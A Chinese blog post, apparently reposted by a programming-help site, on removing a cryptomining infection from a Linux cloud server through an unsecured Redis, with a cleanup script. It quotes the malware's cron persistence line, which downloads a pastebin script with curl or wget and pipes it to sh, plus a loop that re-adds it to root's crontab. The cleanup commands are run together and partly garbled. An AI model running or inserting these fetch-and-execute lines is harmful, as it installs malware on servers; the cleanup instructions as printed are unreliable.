最近3月杀死linux挖矿病毒

概述最近从2月17号开始一直收到阿里云的报警信息; 您的云服务器（120.78.158.127）由于被检测到对外攻击，已阻断该服务器对其它服务器端口（TCP:3389）的访问，阻断预计将在2019-03-19 11:46:21时间内结束，请及时进行安全自查。若有疑问，请工单或电话联系阿里云售后，感谢您对阿里云的支持。     crontab -l 查看定时任务发现有 */15 * * * * (cur

最近从2月17号开始一直收到阿里云的报警信息;

您的云服务器（120.78.158.127）由于被检测到对外攻击，已阻断该服务器对其它服务器端口（TCP:3389）的访问，阻断预计将在2019-03-19 11:46:21时间内结束，请及时进行安全自查。若有疑问，请工单或电话联系阿里云售后，感谢您对阿里云的支持。

 

 

crontab -l 查看定时任务发现有 */15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh
明显是一段挖矿程序

redis也有一个Cache键里放着这个字段*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh

所以我认为是我redis没设密码导致的，具体他是怎么通过redis来倾入，这个不得而知，后续再探究。

sed -i 删除指定任务
太强了有个脚本程序一直在执行echo "*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh" >> /var/spool/cron/root

busyBox top 才能得到未被劫持的so执行程序。

#先要关掉crond,防止在清除过程中又开始下载脚本
service crond stop

# 删除劫持的libcset.so预加载动态链接库，隐藏病毒

# 清理异常进程

# 再次清理异常进程

# 清理开机启动项

 杀毒代码合并ksoftirqds，kthrotlds，kpsmouseds，kintegrityds杀毒

service crond stopbusyBox rm -f /etc/ld.so.preloadbusyBox rm -f /usr/local/lib/libcset.sochattr -i /etc/ld.so.preloadbusyBox rm -f /etc/ld.so.preloadbusyBox rm -f /usr/local/lib/libcset.so# 清理异常进程busyBox ps -ef | busyBox grep -v grep | busyBox egrep ‘ksoftirqds‘ | busyBox awk ‘{print }‘ | busyBox xargs kill -9busyBox ps -ef | busyBox grep -v grep | busyBox egrep ‘kthrotlds‘ | busyBox awk ‘{print }‘ | busyBox xargs kill -9busyBox ps -ef | busyBox grep -v grep | busyBox egrep ‘kpsmouseds‘ | busyBox awk ‘{print }‘ | busyBox xargs kill -9busyBox ps -ef | busyBox grep -v grep | busyBox egrep ‘kintegrityds‘ | busyBox awk ‘{print }‘ | busyBox xargs kill -9busyBox rm -f /tmp/kthrotldsbusyBox rm -f /tmp/kintegritydsbusyBox rm -f /tmp/kpsmousedsbusyBox rm -f /etc/cron.d/tomcatbusyBox rm -f /etc/cron.d/rootbusyBox rm -f /var/spool/cron/rootbusyBox rm -f /var/spool/cron/crontabs/rootbusyBox rm -f /etc/rc.d/init.d/kthrotldsbusyBox rm -f /etc/rc.d/init.d/kpsmousedsbusyBox rm -f /etc/rc.d/init.d/kintegritydsbusyBox rm -f /usr/sbin/kthrotldsbusyBox rm -f /usr/sbin/kintegritydsbusyBox rm -f /usr/sbin/kpsmousedsbusyBox rm -f /etc/init.d/netdnsldconfig# 再次清理异常进程busyBox ps -ef | busyBox grep -v grep | busyBox egrep ‘ksoftirqds‘ | busyBox awk ‘{print }‘ | busyBox xargs kill -9busyBox ps -ef | busyBox grep -v grep | busyBox egrep ‘kthrotlds‘ | busyBox awk ‘{print }‘ | busyBox xargs kill -9busyBox ps -ef | busyBox grep -v grep | busyBox egrep ‘kpsmouseds‘ | busyBox awk ‘{print }‘ | busyBox xargs kill -9busyBox ps -ef | busyBox grep -v grep | busyBox egrep ‘kintegrityds‘ | busyBox awk ‘{print }‘ | busyBox xargs kill -9# 清理开机启动项chkconfig netdns offchkconfig –del netdnsservice crond startecho "Done,Please reboot!"# [email protected]

　　具体杀毒解析流程见：https://www.anquanke.com/post/ID/172111

总结

以上是内存溢出为你收集整理的最近3月杀死linux挖矿病毒全部内容，希望文章能够帮你解决最近3月杀死linux挖矿病毒所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错，欢迎将内存溢出网站推荐给程序员好友。